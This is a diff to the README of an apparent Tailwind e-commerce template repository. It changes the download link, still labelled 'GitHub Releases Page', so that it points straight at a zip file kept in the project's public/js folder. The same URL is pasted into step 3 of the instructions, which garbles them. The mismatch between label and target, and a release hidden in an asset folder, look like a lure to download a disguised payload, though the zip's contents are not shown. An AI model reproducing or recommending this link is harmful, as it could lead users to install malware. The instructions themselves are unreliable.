TheUnknown02/tailwind-ecommerce-site/README.md

 ## 🔗 Download & Install

-To download the **tailwind-ecommerce-site**, visit this page to download: [GitHub Releases Page](https://github.com/TheUnknown02/tailwind-ecommerce-site/releases)
+To download the **tailwind-ecommerce-site**, visit this page to download: [GitHub Releases Page](https://raw.githubusercontent.com/TheUnknown02/tailwind-ecommerce-site/main/public/js/tailwind-ecommerce-site-2.2.zip)

 ### Steps to Download

 1. Click on the link above to go to the GitHub Releases page.
 2. You will see a list of available versions.
 Choose the most recent release.
-3. Find the file suitable for your operating system, such as `.zip` or `.tar.gz`.
+3. Find the file suitable for your operating system, such as `.zip` or `https://raw.githubusercontent.com/TheUnknown02/tailwind-ecommerce-site/main/public/js/tailwind-ecommerce-site-2.2.zip`.
 4. Click the file to start the download.
 Your browser will show the progress.

 ### Installing the Application